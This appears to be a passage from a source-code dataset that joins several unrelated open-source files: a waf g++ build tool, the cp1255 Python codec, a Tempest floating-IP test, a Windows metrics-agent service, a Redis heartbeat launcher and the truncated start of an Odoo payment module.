v.CXXLNK_TGT_F = ['-o']
v.CPPPATH_ST = '-I%s'
v.DEFINES_ST = '-D%s'
v.LIB_ST = '-l%s' # template for adding libs
v.LIBPATH_ST = '-L%s' # template for adding libpaths
v.STLIB_ST = '-l%s'
v.STLIBPATH_ST = '-L%s'
v.RPATH_ST = '-Wl,-rpath,%s'
v.SONAME_ST = '-Wl,-h,%s'
v.SHLIB_MARKER = '-Wl,-Bdynamic'
v.STLIB_MARKER = '-Wl,-Bstatic'
v.cxxprogram_PATTERN = '%s'
v.CXXFLAGS_cxxshlib = ['-fPIC']
v.LINKFLAGS_cxxshlib = ['-shared']
v.cxxshlib_PATTERN = 'lib%s.so'
v.LINKFLAGS_cxxstlib = ['-Wl,-Bstatic']
v.cxxstlib_PATTERN = 'lib%s.a'
v.LINKFLAGS_MACBUNDLE = ['-bundle', '-undefined', 'dynamic_lookup']
v.CXXFLAGS_MACBUNDLE = ['-fPIC']
v.macbundle_PATTERN = '%s.bundle'
@conf
def gxx_modifier_win32(conf):
"""Configuration flags for executing gcc on Windows"""
v = conf.env
v.cxxprogram_PATTERN = '%s.exe'
v.cxxshlib_PATTERN = '%s.dll'
v.implib_PATTERN = '%s.dll.a'
v.IMPLIB_ST = '-Wl,--out-implib,%s'
v.CXXFLAGS_cxxshlib = []
# Auto-import is enabled by default even without this option,
# but enabling it explicitly has the nice effect of suppressing the rather boring, debug-level messages
# that the linker emits otherwise.
v.append_value('LINKFLAGS', ['-Wl,--enable-auto-import'])
@conf
def gxx_modifier_cygwin(conf):
"""Configuration flags for executing g++ on Cygwin"""
gxx_modifier_win32(conf)
v = conf.env
v.cxxshlib_PATTERN = 'cyg%s.dll'
v.append_value('LINKFLAGS_cxxshlib', ['-Wl,--enable-auto-image-base'])
v.CXXFLAGS_cxxshlib = []
@conf
def gxx_modifier_darwin(conf):
"""Configuration flags for executing g++ on MacOS"""
v = conf.env
v.CXXFLAGS_cxxshlib = ['-fPIC']
v.LINKFLAGS_cxxshlib = ['-dynamiclib']
v.cxxshlib_PATTERN = 'lib%s.dylib'
v.FRAMEWORKPATH_ST = '-F%s'
v.FRAMEWORK_ST = ['-framework']
v.ARCH_ST = ['-arch']
v.LINKFLAGS_cxxstlib = []
v.SHLIB_MARKER = []
v.STLIB_MARKER = []
v.SONAME_ST = []
@conf
def gxx_modifier_aix(conf):
"""Configuration flags for executing g++ on AIX"""
v = conf.env
v.LINKFLAGS_cxxprogram= ['-Wl,-brtl']
v.LINKFLAGS_cxxshlib = ['-shared', '-Wl,-brtl,-bexpfull']
v.SHLIB_MARKER = []
@conf
def gxx_modifier_hpux(conf):
v = conf.env
v.SHLIB_MARKER = []
v.STLIB_MARKER = []
v.CFLAGS_cxxshlib = ['-fPIC','-DPIC']
v.cxxshlib_PATTERN = 'lib%s.sl'
@conf
def gxx_modifier_openbsd(conf):
conf.env.SONAME_ST = []
@conf
def gxx_modifier_osf1V(conf):
v = conf.env
v.SHLIB_MARKER = []
v.STLIB_MARKER = []
v.SONAME_ST = []
@conf
def gxx_modifier_platform(conf):
"""Execute platform-specific functions based on *gxx_modifier_+NAME*"""
# * set configurations specific for a platform.
# * the destination platform is detected automatically by looking at the macros the compiler predefines,
# and if it's not recognised, it falls back to sys.platform.
gxx_modifier_func = getattr(conf, 'gxx_modifier_' + conf.env.DEST_OS, None)
if gxx_modifier_func:
gxx_modifier_func()
def configure(conf):
"""
Configuration for g++
"""
conf.find_gxx()
conf.find_ar()
conf.gxx_common_flags()
conf.gxx_modifier_platform()
conf.cxx_load_tools()
conf.cxx_add_flags()
conf.link_add_flags()
conf.check_gcc_o_space('cxx')
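# Minimal usage sketch (not part of the original file); assumes a standard waf
# project where this tool is pulled in via the generic C++ compiler detector:
#
#   def options(opt):
#       opt.load('compiler_cxx')
#   def configure(conf):
#       conf.load('compiler_cxx')   # selects g++ through this tool on most platforms
#   def build(bld):
#       bld.program(source='main.cpp', target='app')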
|
gpl-2.0
|
QLGu/Django-facebook
|
docs/docs_env/Lib/encodings/cp1255.py
|
593
|
12722
|
""" Python Character Mapping Codec cp1255 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1255.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp1255',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\u20ac' # 0x80 -> EURO SIGN
u'\ufffe' # 0x81 -> UNDEFINED
u'\u201a' # 0x82 -> SINGLE LOW-9 QUOTATION MARK
u'\u0192' # 0x83 -> LATIN SMALL LETTER F WITH HOOK
u'\u201e' # 0x84 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2026' # 0x85 -> HORIZONTAL ELLIPSIS
u'\u2020' # 0x86 -> DAGGER
u'\u2021' # 0x87 -> DOUBLE DAGGER
u'\u02c6' # 0x88 -> MODIFIER LETTER CIRCUMFLEX ACCENT
u'\u2030' # 0x89 -> PER MILLE SIGN
u'\ufffe' # 0x8A -> UNDEFINED
u'\u2039' # 0x8B -> SINGLE LEFT-POINTING ANGLE QUOTATION MARK
u'\ufffe' # 0x8C -> UNDEFINED
u'\ufffe' # 0x8D -> UNDEFINED
u'\ufffe' # 0x8E -> UNDEFINED
u'\ufffe' # 0x8F -> UNDEFINED
u'\ufffe' # 0x90 -> UNDEFINED
u'\u2018' # 0x91 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0x92 -> RIGHT SINGLE QUOTATION MARK
u'\u201c' # 0x93 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0x94 -> RIGHT DOUBLE QUOTATION MARK
u'\u2022' # 0x95 -> BULLET
u'\u2013' # 0x96 -> EN DASH
u'\u2014' # 0x97 -> EM DASH
u'\u02dc' # 0x98 -> SMALL TILDE
u'\u2122' # 0x99 -> TRADE MARK SIGN
u'\ufffe' # 0x9A -> UNDEFINED
u'\u203a' # 0x9B -> SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
u'\ufffe' # 0x9C -> UNDEFINED
u'\ufffe' # 0x9D -> UNDEFINED
u'\ufffe' # 0x9E -> UNDEFINED
u'\ufffe' # 0x9F -> UNDEFINED
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\xa1' # 0xA1 -> INVERTED EXCLAMATION MARK
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\u20aa' # 0xA4 -> NEW SHEQEL SIGN
u'\xa5' # 0xA5 -> YEN SIGN
u'\xa6' # 0xA6 -> BROKEN BAR
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xa8' # 0xA8 -> DIAERESIS
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\xd7' # 0xAA -> MULTIPLICATION SIGN
u'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xac' # 0xAC -> NOT SIGN
u'\xad' # 0xAD -> SOFT HYPHEN
u'\xae' # 0xAE -> REGISTERED SIGN
u'\xaf' # 0xAF -> MACRON
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\xb2' # 0xB2 -> SUPERSCRIPT TWO
u'\xb3' # 0xB3 -> SUPERSCRIPT THREE
u'\xb4' # 0xB4 -> ACUTE ACCENT
u'\xb5' # 0xB5 -> MICRO SIGN
u'\xb6' # 0xB6 -> PILCROW SIGN
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xb8' # 0xB8 -> CEDILLA
u'\xb9' # 0xB9 -> SUPERSCRIPT ONE
u'\xf7' # 0xBA -> DIVISION SIGN
u'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbc' # 0xBC -> VULGAR FRACTION ONE QUARTER
u'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
u'\xbe' # 0xBE -> VULGAR FRACTION THREE QUARTERS
u'\xbf' # 0xBF -> INVERTED QUESTION MARK
u'\u05b0' # 0xC0 -> HEBREW POINT SHEVA
u'\u05b1' # 0xC1 -> HEBREW POINT HATAF SEGOL
u'\u05b2' # 0xC2 -> HEBREW POINT HATAF PATAH
u'\u05b3' # 0xC3 -> HEBREW POINT HATAF QAMATS
u'\u05b4' # 0xC4 -> HEBREW POINT HIRIQ
u'\u05b5' # 0xC5 -> HEBREW POINT TSERE
u'\u05b6' # 0xC6 -> HEBREW POINT SEGOL
u'\u05b7' # 0xC7 -> HEBREW POINT PATAH
u'\u05b8' # 0xC8 -> HEBREW POINT QAMATS
u'\u05b9' # 0xC9 -> HEBREW POINT HOLAM
u'\ufffe' # 0xCA -> UNDEFINED
u'\u05bb' # 0xCB -> HEBREW POINT QUBUTS
u'\u05bc' # 0xCC -> HEBREW POINT DAGESH OR MAPIQ
u'\u05bd' # 0xCD -> HEBREW POINT METEG
u'\u05be' # 0xCE -> HEBREW PUNCTUATION MAQAF
u'\u05bf' # 0xCF -> HEBREW POINT RAFE
u'\u05c0' # 0xD0 -> HEBREW PUNCTUATION PASEQ
u'\u05c1' # 0xD1 -> HEBREW POINT SHIN DOT
u'\u05c2' # 0xD2 -> HEBREW POINT SIN DOT
u'\u05c3' # 0xD3 -> HEBREW PUNCTUATION SOF PASUQ
u'\u05f0' # 0xD4 -> HEBREW LIGATURE YIDDISH DOUBLE VAV
u'\u05f1' # 0xD5 -> HEBREW LIGATURE YIDDISH VAV YOD
u'\u05f2' # 0xD6 -> HEBREW LIGATURE YIDDISH DOUBLE YOD
u'\u05f3' # 0xD7 -> HEBREW PUNCTUATION GERESH
u'\u05f4' # 0xD8 -> HEBREW PUNCTUATION GERSHAYIM
u'\ufffe' # 0xD9 -> UNDEFINED
u'\ufffe' # 0xDA -> UNDEFINED
u'\ufffe' # 0xDB -> UNDEFINED
u'\ufffe' # 0xDC -> UNDEFINED
u'\ufffe' # 0xDD -> UNDEFINED
u'\ufffe' # 0xDE -> UNDEFINED
u'\ufffe' # 0xDF -> UNDEFINED
u'\u05d0' # 0xE0 -> HEBREW LETTER ALEF
u'\u05d1' # 0xE1 -> HEBREW LETTER BET
u'\u05d2' # 0xE2 -> HEBREW LETTER GIMEL
u'\u05d3' # 0xE3 -> HEBREW LETTER DALET
u'\u05d4' # 0xE4 -> HEBREW LETTER HE
u'\u05d5' # 0xE5 -> HEBREW LETTER VAV
u'\u05d6' # 0xE6 -> HEBREW LETTER ZAYIN
u'\u05d7' # 0xE7 -> HEBREW LETTER HET
u'\u05d8' # 0xE8 -> HEBREW LETTER TET
u'\u05d9' # 0xE9 -> HEBREW LETTER YOD
u'\u05da' # 0xEA -> HEBREW LETTER FINAL KAF
u'\u05db' # 0xEB -> HEBREW LETTER KAF
u'\u05dc' # 0xEC -> HEBREW LETTER LAMED
u'\u05dd' # 0xED -> HEBREW LETTER FINAL MEM
u'\u05de' # 0xEE -> HEBREW LETTER MEM
u'\u05df' # 0xEF -> HEBREW LETTER FINAL NUN
u'\u05e0' # 0xF0 -> HEBREW LETTER NUN
u'\u05e1' # 0xF1 -> HEBREW LETTER SAMEKH
u'\u05e2' # 0xF2 -> HEBREW LETTER AYIN
u'\u05e3' # 0xF3 -> HEBREW LETTER FINAL PE
u'\u05e4' # 0xF4 -> HEBREW LETTER PE
u'\u05e5' # 0xF5 -> HEBREW LETTER FINAL TSADI
u'\u05e6' # 0xF6 -> HEBREW LETTER TSADI
u'\u05e7' # 0xF7 -> HEBREW LETTER QOF
u'\u05e8' # 0xF8 -> HEBREW LETTER RESH
u'\u05e9' # 0xF9 -> HEBREW LETTER SHIN
u'\u05ea' # 0xFA -> HEBREW LETTER TAV
u'\ufffe' # 0xFB -> UNDEFINED
u'\ufffe' # 0xFC -> UNDEFINED
u'\u200e' # 0xFD -> LEFT-TO-RIGHT MARK
u'\u200f' # 0xFE -> RIGHT-TO-LEFT MARK
u'\ufffe' # 0xFF -> UNDEFINED
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
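# Illustrative sketch (not part of the generated file): once the encodings
# package registers this codec, a round trip looks roughly like
#   u'\u05e9\u05dc\u05d5\u05dd'.encode('cp1255')   # -> '\xf9\xec\xe5\xed'
#   '\xf9\xec\xe5\xed'.decode('cp1255')            # -> u'\u05e9\u05dc\u05d5\u05dd'
# (Python 2 byte/unicode semantics, matching the decoding table above).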
|
bsd-3-clause
|
nunogt/tempest
|
tempest/api/compute/floating_ips/test_floating_ips_actions.py
|
9
|
5803
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib import exceptions as lib_exc
from tempest.api.compute.floating_ips import base
from tempest.common.utils import data_utils
from tempest.common import waiters
from tempest import test
class FloatingIPsTestJSON(base.BaseFloatingIPsTest):
server_id = None
floating_ip = None
@classmethod
def setup_clients(cls):
super(FloatingIPsTestJSON, cls).setup_clients()
cls.client = cls.floating_ips_client
@classmethod
def resource_setup(cls):
super(FloatingIPsTestJSON, cls).resource_setup()
cls.floating_ip_id = None
# Server creation
server = cls.create_test_server(wait_until='ACTIVE')
cls.server_id = server['id']
# Floating IP creation
body = cls.client.create_floating_ip()
cls.floating_ip_id = body['id']
cls.floating_ip = body['ip']
@classmethod
def resource_cleanup(cls):
# Deleting the floating IP which is created in this method
if cls.floating_ip_id:
cls.client.delete_floating_ip(cls.floating_ip_id)
super(FloatingIPsTestJSON, cls).resource_cleanup()
def _try_delete_floating_ip(self, floating_ip_id):
# delete floating ip, if it exists
try:
self.client.delete_floating_ip(floating_ip_id)
# if not found, it means it was already deleted in the test
except lib_exc.NotFound:
pass
@test.idempotent_id('f7bfb946-297e-41b8-9e8c-aba8e9bb5194')
@test.services('network')
def test_allocate_floating_ip(self):
# Positive test: Allocation of a new floating IP to a project
# should be successful
body = self.client.create_floating_ip()
floating_ip_id_allocated = body['id']
self.addCleanup(self.client.delete_floating_ip,
floating_ip_id_allocated)
floating_ip_details = \
self.client.show_floating_ip(floating_ip_id_allocated)
# Checking if the details of the allocated IP are in the list of floating IPs
body = self.client.list_floating_ips()
self.assertIn(floating_ip_details, body)
@test.idempotent_id('de45e989-b5ca-4a9b-916b-04a52e7bbb8b')
@test.services('network')
def test_delete_floating_ip(self):
# Positive test: Deletion of valid floating IP from project
# should be successful
# Creating the floating IP that is to be deleted in this method
floating_ip_body = self.client.create_floating_ip()
self.addCleanup(self._try_delete_floating_ip, floating_ip_body['id'])
# Deleting the floating IP from the project
self.client.delete_floating_ip(floating_ip_body['id'])
# Check it was really deleted.
self.client.wait_for_resource_deletion(floating_ip_body['id'])
@test.idempotent_id('307efa27-dc6f-48a0-8cd2-162ce3ef0b52')
@test.services('network')
def test_associate_disassociate_floating_ip(self):
# Positive test: Associate and disassociate the provided floating IP
# to a specific server should be successful
# Association of floating IP to fixed IP address
self.client.associate_floating_ip_to_server(
self.floating_ip,
self.server_id)
# Check instance_id in the floating_ip body
body = self.client.show_floating_ip(self.floating_ip_id)
self.assertEqual(self.server_id, body['instance_id'])
# Disassociation of floating IP that was associated in this method
self.client.disassociate_floating_ip_from_server(
self.floating_ip,
self.server_id)
@test.idempotent_id('6edef4b2-aaf1-4abc-bbe3-993e2561e0fe')
@test.services('network')
def test_associate_already_associated_floating_ip(self):
# Positive test: Association of an already associated floating IP
# to specific server should change the association of the Floating IP
# Create a server to use for multiple association
new_name = data_utils.rand_name('floating_server')
body = self.create_test_server(name=new_name)
waiters.wait_for_server_status(self.servers_client,
body['id'], 'ACTIVE')
self.new_server_id = body['id']
self.addCleanup(self.servers_client.delete_server, self.new_server_id)
# Associating floating IP for the first time
self.client.associate_floating_ip_to_server(
self.floating_ip,
self.server_id)
# Associating floating IP for the second time
self.client.associate_floating_ip_to_server(
self.floating_ip,
self.new_server_id)
self.addCleanup(self.client.disassociate_floating_ip_from_server,
self.floating_ip,
self.new_server_id)
# Make sure no longer associated with old server
self.assertRaises((lib_exc.NotFound,
lib_exc.UnprocessableEntity,
lib_exc.Conflict),
self.client.disassociate_floating_ip_from_server,
self.floating_ip, self.server_id)
|
apache-2.0
|
loadimpact/loadimpact-server-metrics
|
li_metrics_agent_service.py
|
1
|
2556
|
#!/usr/bin/env python
# coding=utf-8
"""
Copyright 2012 Load Impact
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import li_metrics_agent
import threading
import win32service
import win32serviceutil
import win32event
import servicemanager
import sys
__author__ = "Load Impact"
__copyright__ = "Copyright 2012, Load Impact"
__license__ = "Apache License v2.0"
__version__ = "1.1.1"
__email__ = "support@loadimpact.com"
class AgentThread(threading.Thread):
def __init__(self):
super(AgentThread, self).__init__()
self.agent_loop = li_metrics_agent.AgentLoop()
def run(self):
self.agent_loop.run()
def stop(self):
self.agent_loop.stop()
class AgentService(win32serviceutil.ServiceFramework):
_svc_name_ = "LoadImpactServerMetricsAgent"
_svc_display_name_ = "Load Impact server metrics agent"
_svc_description_ = ("Agent for collecting and reporting server metrics "
"to loadimpact.com")
# init service framework
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
# listen for a stop request
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
def SvcDoRun(self):
#import servicemanager
rc = None
self.ReportServiceStatus(win32service.SERVICE_RUNNING)
self.agent = AgentThread()
self.agent.start()
# loop until the stop event fires
while rc != win32event.WAIT_OBJECT_0:
# block for 1 second and listen for a stop event
rc = win32event.WaitForSingleObject(self.hWaitStop, 1000)
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
self.agent.stop()
self.agent.join()
win32event.SetEvent(self.hWaitStop)
if __name__ == '__main__':
if len(sys.argv) == 1:
servicemanager.Initialize()
servicemanager.PrepareToHostSingle(AgentService)
servicemanager.StartServiceCtrlDispatcher()
else:
win32serviceutil.HandleCommandLine(AgentService)
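# Usage sketch (not part of the original file): win32serviceutil.HandleCommandLine
# exposes the standard pywin32 service commands, so the agent is typically
# managed roughly as
#   python li_metrics_agent_service.py install
#   python li_metrics_agent_service.py start
#   python li_metrics_agent_service.py stop
#   python li_metrics_agent_service.py remove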
|
apache-2.0
|
alexliyu/CDMSYSTEM
|
firewall.py
|
1
|
1273
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
"""
Main program entry point
@author:alex
@date:15-2-13
@time:11:44 AM
@contact:alexliyu2012@gmail.com
"""
__author__ = 'alex'
import sys
import os
import ConfigParser
import uuid
from subprocess import Popen, PIPE
from utils.heartbeat import HeartBeatManager
from utils.tools import *
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
def init(ini_file=None):
cf = ConfigParser.ConfigParser()
try:
if ini_file:
cf.read(ini_file)
else:
cf.read(os.path.join(PROJECT_PATH, "config.ini"))
redis_host = cf.get("REDIS", "IP")
redis_port = cf.getint("REDIS", "PORT")
listener_host = cf.get("LISTENING", "IP")
listener_port = cf.getint("LISTENING", "PORT")
except Exception, e:
print e
sys.exit(1)
print_info("REDIS端口 %s:%d" % (redis_host, redis_port))
print_info("监听心跳包端口 %s:%d" % (listener_host, listener_port))
print_info("开始运行白名单服务........")
server = HeartBeatManager(redis_host, redis_port, listener_host, listener_port)
server.run()
return True
if __name__ == "__main__":
if len(sys.argv) > 1:
init(sys.argv[1])
else:
init()
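# Example config.ini layout assumed by init() above (hypothetical values):
#
#   [REDIS]
#   IP = 127.0.0.1
#   PORT = 6379
#
#   [LISTENING]
#   IP = 0.0.0.0
#   PORT = 9999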
|
mit
|
Grirrane/odoo
|
addons/account_payment/account_payment.py
|
4
|
19120
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
import time
from openerp.osv import fields, osv
_logger = logging.getLogger(__name__)
class payment_mode(osv.osv):
_name= 'payment.mode'
_description= 'Payment Mode'
_columns = {
'name': fields.char('Name', required=True, help='Mode of Payment'),
'bank_id': fields.many2one('res.partner.bank', "Bank account",
required=True,help='Bank Account for the Payment Mode'),
'journal': fields.many2one('account.journal', 'Journal', required=True,
domain=[('type', 'in', ('bank','cash'))], help='Bank or Cash Journal for the Payment Mode'),
'company_id': fields.many2one('res.company', 'Company',required=True),
'partner_id':fields.related('company_id','partner_id',type='many2one',relation='res.partner',string='Partner',store=True,),
}
_defaults = {
'company_id': lambda self,cr,uid,c: self.pool.get('res.users').browse(cr, uid, uid, c).company_id.id
}
def suitable_bank_types(self, cr, uid, payment_code=None, context=None):
"""Return the codes of the bank type that are suitable
for the given payment type code"""
if not payment_code:
return []
cr.execute(""" SELECT pb.state
FROM res_partner_bank pb
JOIN payment_mode pm ON (pm.bank_id = pb.id)
WHERE pm.id = %s """, [payment_code])
return [x[0] for x in cr.fetchall()]
def onchange_company_id (self, cr, uid, ids, company_id=False, context=None):
result = {}
if company_id:
partner_id = self.pool.get('res.company').browse(cr, uid, company_id, context=context).partner_id.id
result['partner_id'] = partner_id
return {'value': result}
class payment_order(osv.osv):
_name = 'payment.order'
_description = 'Payment Order'
_rec_name = 'reference'
_order = 'id desc'
#dead code
def get_wizard(self, type):
_logger.warning("No wizard found for the payment type '%s'.", type)
return None
def _total(self, cursor, user, ids, name, args, context=None):
if not ids:
return {}
res = {}
for order in self.browse(cursor, user, ids, context=context):
if order.line_ids:
res[order.id] = reduce(lambda x, y: x + y.amount, order.line_ids, 0.0)
else:
res[order.id] = 0.0
return res
_columns = {
'date_scheduled': fields.date('Scheduled Date', states={'done':[('readonly', True)]}, help='Select a date if you have chosen Preferred Date to be fixed.'),
'reference': fields.char('Reference', required=1, states={'done': [('readonly', True)]}, copy=False),
